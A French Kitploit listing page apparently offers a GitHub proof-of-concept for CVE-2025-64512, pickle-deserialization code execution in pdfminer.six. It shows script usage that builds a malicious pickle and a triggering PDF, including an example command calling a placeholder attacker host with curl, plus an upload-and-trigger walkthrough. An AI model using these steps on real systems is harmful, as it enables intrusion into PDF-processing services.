Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-64512 — CVE-2025-64512 : pdfminer.six désérialisation pickle rce ; .pickle.gz + générateur pdf avec charges utiles personnalisées | Kitploit
Outils/GitHubGitHub/matesz44/cve-2025-64512
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmatesz44/cve-2025-64512

CVE-2025-64512

CVE-2025-64512 : pdfminer.six désérialisation pickle rce ; .pickle.gz + générateur pdf avec charges utiles personnalisées

Voir le dépôt
414il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-64512 Exécution de code arbitraire dans pdfminer.six via une entrée PDF contrefaite PoC

  • basé sur https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp

% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz

% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]

Create PDF that triggers pdfminer.six pickle deserialization (CVE-2025-64512)

arguments positionnels : pickle_name Nom du fichier pickle sans .pickle.gz (par défaut : evil)

options : -h, --help afficher ce message d'aide et quitter -o, --output OUTPUT Nom du fichier PDF de sortie (par défaut : exploit.pdf) -p, --path PATH Chemin absolu personnalisé vers le pickle (sans .pickle.gz) -f, --fuzz Générer des PDFs pour tous les chemins absolus courants


python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a

(Téléchargez evil.pickle.gz vers /var/www/html/files/evil.pickle.gz)

python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz

(Téléchargez ex-poc.pdf et déclenchez/attendez le traitement du PDF)

ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a

Télécharger l’outil